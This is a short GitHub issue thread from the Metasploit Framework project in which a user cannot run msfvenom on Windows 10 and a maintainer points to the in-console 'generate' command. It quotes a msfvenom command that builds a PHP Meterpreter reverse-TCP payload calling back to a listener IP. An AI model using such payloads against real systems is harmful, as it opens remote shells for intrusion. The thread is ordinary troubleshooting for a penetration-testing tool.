### ISSUE TITLE
Msfvenom not working in Windows 10

### ISSUE THREAD

**Issue by pandab3ast** [rapid7/metasploit-framework#10854]
I installed Metasploit with:
- [ ] In WIndows 10 using setup from github/rapid7
Setup starts after postgresql installed(usually takes 10-15minutes), today I've installed rubyx64 as well
 I'm not sure, from where I can create payload using msfvenom command in windows, If I issue the below command in msfconsole, 
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.153 LPORT=4444 -f raw
Output(from msfconsole):
[*] exec: msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.153 LPORT=4444 -f raw

[-] Permission denied exec: msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.153 LPORT=4444 -f raw

Output(from windows cmd)
'msfvenom' is not recognized as an internal or external command,
operable program or batch file.

Kindly let me know how can I fix this issue and generate the payload from Windows

**Comment by busterb** [comment]
I suggest using the 'generate' command from within metasploit framework. Don't use 'msfvenom'.

`use payload/php/meterpreter/reverse_tcp`
`generate -h`
